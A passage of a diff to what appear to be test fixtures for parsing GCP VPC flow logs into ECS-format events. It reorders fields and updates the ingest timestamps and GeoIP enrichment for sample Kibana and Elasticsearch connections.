"2021-12-14T14:43:27.415297443Z", + "original": "{\"insertId\":\"1gq7q7afe373ew\",\"jsonPayload\":{\"bytes_sent\":\"1780\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":56478,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:47:20.566586739Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:47:20.450631492Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", + "kind": "event", + "start": "2019-06-14T03:47:20.450631492Z", + "end": "2019-06-14T03:47:20.566586739Z", + "id": "1gq7q7afe373ew", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -23788,59 +24971,24 @@ "iana_number": "6", "packets": 7, "direction": "outbound" - }, - "@timestamp": "2019-06-14T03:50:17.763Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "10.87.40.76", - "67.43.156.14" - ] - }, - "gcp": { - "vpcflow": { - "reporter": "SRC", - "rtt": { - "ms": 36 - } - }, - "source": { - "vpc": { - "project_id": "my-sample-project", - "subnetwork_name": "default", - "vpc_name": "default" - }, - "instance": { - "region": "us-east1", - "project_id": "my-sample-project", - "zone": "us-east1-b" - } - } - }, - "event": { - "ingested": "2021-12-09T13:37:46.392501400Z", - "original": "{\"insertId\":\"1gq7q7afe373ew\",\"jsonPayload\":{\"bytes_sent\":\"1780\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":56478,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:47:20.566586739Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:47:20.450631492Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", - "kind": "event", - "start": "2019-06-14T03:47:20.450631492Z", - "end": "2019-06-14T03:47:20.566586739Z", - "id": "1gq7q7afe373ew", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + } + }, + { + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, @@ -23918,7 +25066,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.392507100Z", + "ingested": "2021-12-14T14:43:27.415297834Z", "original": "{\"insertId\":\"1gq7q7afe373e9\",\"jsonPayload\":{\"bytes_sent\":\"64140\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33694},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565311154Z\",\"packets_sent\":\"371\",\"reporter\":\"SRC\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:05.566359759Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", "kind": "event", "start": "2019-06-14T03:40:05.566359759Z", @@ -23929,41 +25077,6 @@ } }, { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, - "destination": { - "address": "10.87.40.76", - "port": 5601, - "domain": "kibana", - "ip": "10.87.40.76" - }, - "source": { - "geo": { - "continent_name": "America", - "country_name": "usa" - }, - "as": { - "number": 15169 - }, - "address": "67.43.156.13", - "port": 53096, - "bytes": 1458, - "ip": "67.43.156.13", - "packets": 7 - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:PZTJxnZbum9ENBi23DLcdTxQuaQ=", - "bytes": 1458, - "transport": "tcp", - "type": "ipv4", - "iana_number": "6", - "packets": 7, - "direction": "inbound" - }, "@timestamp": "2019-06-14T03:50:17.763Z", "ecs": { "version": "1.12.0" @@ -23974,6 +25087,9 @@ "10.87.40.76" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "destination": { "vpc": { @@ -23994,8 +25110,33 @@ } } }, + "destination": { + "address": "10.87.40.76", + "port": 5601, + "domain": "kibana", + "ip": "10.87.40.76" + }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.13", + "port": 53096, + "bytes": 1458, + "ip": "67.43.156.13", + "packets": 7 + }, "event": { - "ingested": "2021-12-09T13:37:46.392512800Z", + "ingested": "2021-12-14T14:43:27.415298343Z", "original": "{\"insertId\":\"1gq7q7afe373f9\",\"jsonPayload\":{\"bytes_sent\":\"1458\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":53096},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:43:20.813699795Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:43:20.700692281Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", "kind": "event", "start": "2019-06-14T03:43:20.700692281Z", @@ -24003,6 +25144,18 @@ "id": "1gq7q7afe373f9", "category": "network", "type": "connection" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:PZTJxnZbum9ENBi23DLcdTxQuaQ=", + "bytes": 1458, + "transport": "tcp", + "type": "ipv4", + "iana_number": "6", + "packets": 7, + "direction": "inbound" } }, { @@ -24017,11 +25170,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, @@ -24093,7 +25251,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.392518300Z", + "ingested": "2021-12-14T14:43:27.415299124Z", "original": "{\"insertId\":\"1gq7q7afe373f1\",\"jsonPayload\":{\"bytes_sent\":\"231764\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33694,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565311154Z\",\"packets_sent\":\"251\",\"reporter\":\"DEST\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:05.566359759Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", "kind": "event", "start": "2019-06-14T03:40:05.566359759Z", @@ -24104,43 +25262,6 @@ } }, { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, - "destination": { - "geo": { - "continent_name": "America", - "country_name": "usa", - "city_name": "Broomfield", - "region_name": "Colorado" - }, - "as": { - "number": 33652 - }, - "address": "67.43.156.13", - "port": 65276, - "ip": "67.43.156.13" - }, - "source": { - "address": "10.139.99.242", - "port": 9200, - "bytes": 107878, - "packets": 614, - "domain": "elasticsearch", - "ip": "10.139.99.242" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:yOQ797bLdJqqOXP0XZt1Vg63dm0=", - "bytes": 107878, - "transport": "tcp", - "type": "ipv4", - "iana_number": "6", - "packets": 614, - "direction": "outbound" - }, "@timestamp": "2019-06-14T03:50:17.763Z", "ecs": { "version": "1.12.0" @@ -24151,6 +25272,9 @@ "67.43.156.13" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "vpcflow": { "reporter": "SRC", @@ -24171,8 +25295,33 @@ } } }, + "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.13", + "port": 65276, + "ip": "67.43.156.13" + }, + "source": { + "address": "10.139.99.242", + "port": 9200, + "bytes": 107878, + "packets": 614, + "domain": "elasticsearch", + "ip": "10.139.99.242" + }, "event": { - "ingested": "2021-12-09T13:37:46.392523800Z", + "ingested": "2021-12-14T14:43:27.415299567Z", "original": "{\"insertId\":\"1gq7q7afe373ff\",\"jsonPayload\":{\"bytes_sent\":\"107878\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":65276,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.220621567Z\",\"packets_sent\":\"614\",\"reporter\":\"SRC\",\"rtt_msec\":\"156\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.760349279Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", "kind": "event", "start": "2019-06-14T03:40:00.760349279Z", @@ -24180,6 +25329,18 @@ "id": "1gq7q7afe373ff", "category": "network", "type": "connection" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:yOQ797bLdJqqOXP0XZt1Vg63dm0=", + "bytes": 107878, + "transport": "tcp", + "type": "ipv4", + "iana_number": "6", + "packets": 614, + "direction": "outbound" } }, { @@ -24194,11 +25355,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 52430, @@ -24270,7 +25436,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.392528Z", + "ingested": "2021-12-14T14:43:27.415300060Z", "original": "{\"insertId\":\"1gq7q7afe373fq\",\"jsonPayload\":{\"bytes_sent\":\"595838\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":52430},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:53.081386115Z\",\"packets_sent\":\"299\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-central1\",\"vm_name\":\"zeek-nsm\",\"zone\":\"us-central1-a\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:07.968717244Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", "kind": "event", "start": "2019-06-14T03:40:07.968717244Z", @@ -24281,16 +25447,51 @@ } }, { + "@timestamp": "2019-06-14T03:50:19.219Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "10.87.40.76", + "67.43.156.14" + ] + }, "log": { "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" }, + "gcp": { + "vpcflow": { + "reporter": "SRC", + "rtt": { + "ms": 37 + } + }, + "source": { + "vpc": { + "project_id": "my-sample-project", + "subnetwork_name": "default", + "vpc_name": "default" + }, + "instance": { + "region": "us-east1", + "project_id": "my-sample-project", + "zone": "us-east1-b" + } + } + }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 56410, @@ -24304,6 +25505,16 @@ "domain": "kibana", "ip": "10.87.40.76" }, + "event": { + "ingested": "2021-12-14T14:43:27.415300446Z", + "original": "{\"insertId\":\"14iipwlfd8t01n\",\"jsonPayload\":{\"bytes_sent\":\"1780\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":56410,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:47:10.630345069Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"37\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:47:10.514594429Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", + "kind": "event", + "start": "2019-06-14T03:47:10.514594429Z", + "end": "2019-06-14T03:47:10.630345069Z", + "id": "14iipwlfd8t01n", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -24315,7 +25526,9 @@ "iana_number": "6", "packets": 7, "direction": "outbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:19.219Z", "ecs": { "version": "1.12.0" @@ -24323,14 +25536,17 @@ "related": { "ip": [ "10.87.40.76", - "67.43.156.14" + "192.168.2.117" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "vpcflow": { "reporter": "SRC", "rtt": { - "ms": 37 + "ms": 36 } }, "source": { @@ -24346,21 +25562,6 @@ } } }, - "event": { - "ingested": "2021-12-09T13:37:46.392532700Z", - "original": "{\"insertId\":\"14iipwlfd8t01n\",\"jsonPayload\":{\"bytes_sent\":\"1780\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":56410,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:47:10.630345069Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"37\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:47:10.514594429Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", - "kind": "event", - "start": "2019-06-14T03:47:10.514594429Z", - "end": "2019-06-14T03:47:10.630345069Z", - "id": "14iipwlfd8t01n", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "geo": { "continent_name": "America", @@ -24381,50 +25582,8 @@ "domain": "kibana", "ip": "10.87.40.76" }, - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:jcjE3OEEgs/JCmhTXaJJ97LHMMA=", - "bytes": 1781, - "transport": "tcp", - "type": "ipv4", - "iana_number": "6", - "packets": 7, - "direction": "outbound" - }, - "@timestamp": "2019-06-14T03:50:19.219Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "10.87.40.76", - "192.168.2.117" - ] - }, - "gcp": { - "vpcflow": { - "reporter": "SRC", - "rtt": { - "ms": 36 - } - }, - "source": { - "vpc": { - "project_id": "my-sample-project", - "subnetwork_name": "default", - "vpc_name": "default" - }, - "instance": { - "region": "us-east1", - "project_id": "my-sample-project", - "zone": "us-east1-b" - } - } - }, "event": { - "ingested": "2021-12-09T13:37:46.392537700Z", + "ingested": "2021-12-14T14:43:27.415300837Z", "original": "{\"insertId\":\"14iipwlfd8t01j\",\"jsonPayload\":{\"bytes_sent\":\"1781\",\"connection\":{\"dest_ip\":\"192.168.2.117\",\"dest_port\":51950,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:41:50.757658840Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:41:50.645030007Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", "kind": "event", "start": "2019-06-14T03:41:50.645030007Z", @@ -24432,6 +25591,18 @@ "id": "14iipwlfd8t01j", "category": "network", "type": "connection" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:jcjE3OEEgs/JCmhTXaJJ97LHMMA=", + "bytes": 1781, + "transport": "tcp", + "type": "ipv4", + "iana_number": "6", + "packets": 7, + "direction": "outbound" } }, { @@ -24440,11 +25611,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33876, @@ -24522,7 +25698,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.392542600Z", + "ingested": "2021-12-14T14:43:27.415301226Z", "original": "{\"insertId\":\"14iipwlfd8t01o\",\"jsonPayload\":{\"bytes_sent\":\"361966\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33876,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:37.933154111Z\",\"packets_sent\":\"80\",\"reporter\":\"SRC\",\"rtt_msec\":\"34\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.466868771Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.466868771Z", @@ -24533,9 +25709,39 @@ } }, { + "@timestamp": "2019-06-14T03:50:19.219Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "192.168.2.117", + "10.87.40.76" + ] + }, "log": { "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" }, + "gcp": { + "destination": { + "vpc": { + "project_id": "my-sample-project", + "subnetwork_name": "default", + "vpc_name": "default" + }, + "instance": { + "region": "us-east1", + "project_id": "my-sample-project", + "zone": "us-east1-b" + } + }, + "vpcflow": { + "reporter": "DEST", + "rtt": { + "ms": 36 + } + } + }, "destination": { "address": "10.87.40.76", "port": 5601, @@ -24556,6 +25762,16 @@ "ip": "192.168.2.117", "packets": 7 }, + "event": { + "ingested": "2021-12-14T14:43:27.415301611Z", + "original": "{\"insertId\":\"14iipwlfd8t01p\",\"jsonPayload\":{\"bytes_sent\":\"1457\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"192.168.2.117\",\"src_port\":51950},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:41:50.757658840Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:41:50.645030007Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", + "kind": "event", + "start": "2019-06-14T03:41:50.645030007Z", + "end": "2019-06-14T03:41:50.757658840Z", + "id": "14iipwlfd8t01p", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -24567,19 +25783,30 @@ "iana_number": "6", "packets": 7, "direction": "inbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:19.219Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ - "192.168.2.117", - "10.87.40.76" + "10.87.40.76", + "192.168.2.117" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { - "destination": { + "vpcflow": { + "reporter": "SRC", + "rtt": { + "ms": 36 + } + }, + "source": { "vpc": { "project_id": "my-sample-project", "subnetwork_name": "default", @@ -24590,29 +25817,8 @@ "project_id": "my-sample-project", "zone": "us-east1-b" } - }, - "vpcflow": { - "reporter": "DEST", - "rtt": { - "ms": 36 - } } }, - "event": { - "ingested": "2021-12-09T13:37:46.392546400Z", - "original": "{\"insertId\":\"14iipwlfd8t01p\",\"jsonPayload\":{\"bytes_sent\":\"1457\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"192.168.2.117\",\"src_port\":51950},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:41:50.757658840Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:41:50.645030007Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", - "kind": "event", - "start": "2019-06-14T03:41:50.645030007Z", - "end": "2019-06-14T03:41:50.757658840Z", - "id": "14iipwlfd8t01p", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, 